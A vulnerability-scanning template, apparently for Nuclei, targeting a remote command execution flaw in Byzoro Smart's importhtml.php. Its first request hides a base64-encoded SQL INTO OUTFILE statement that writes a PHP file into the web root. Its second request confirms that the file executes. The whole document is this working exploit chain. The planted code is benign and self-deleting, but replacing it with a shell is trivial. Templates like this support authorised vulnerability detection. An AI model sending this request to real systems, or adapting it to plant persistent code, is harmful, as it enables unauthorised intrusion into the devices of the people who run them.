id: byzoro-smart-importhtml-rce

info:
  name: 百卓 Smart importhtml.php 远程命令执行漏洞
  author: SleepingBag945
  severity: critical
  description: |-
    百卓 importhtml.php文件sql语句无过滤，通过Sql语句可远程命令执行
  reference:
    - https://peiqi.wgpsec.org/wiki/iot/%E7%99%BE%E5%8D%93/%E7%99%BE%E5%8D%93%20Smart%20importhtml.php%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.html
  tags: rce

http:
  - raw:
      - |
        GET /importhtml.php?type=exporthtmlmail&tab=tb_RCtrlLog&sql=c2VsZWN0IDB4M2MzZjcwNjg3MDIwNjU2MzY4NmYyMDZkNjQzNTI4MzIzMzMzMjkzYjc1NmU2YzY5NmU2YjI4NWY1ZjQ2NDk0YzQ1NWY1ZjI5M2IzZjNlIGludG8gb3V0ZmlsZSAnL3Vzci9oZGRvY3MvbnNnL2FwcC90YW1lLnBocCcg HTTP/1.1
        Host: {{Hostname}}
      
      - |
        GET /app/tame.php HTTP/1.1
        Host: {{Hostname}}

    req-condition: true
    matchers:
      - type: dsl
        dsl:
          - status_code_1==200
          - status_code_2==200 && contains(body_2,"e165421110ba03099a1c0393373c5b43")
        condition: and
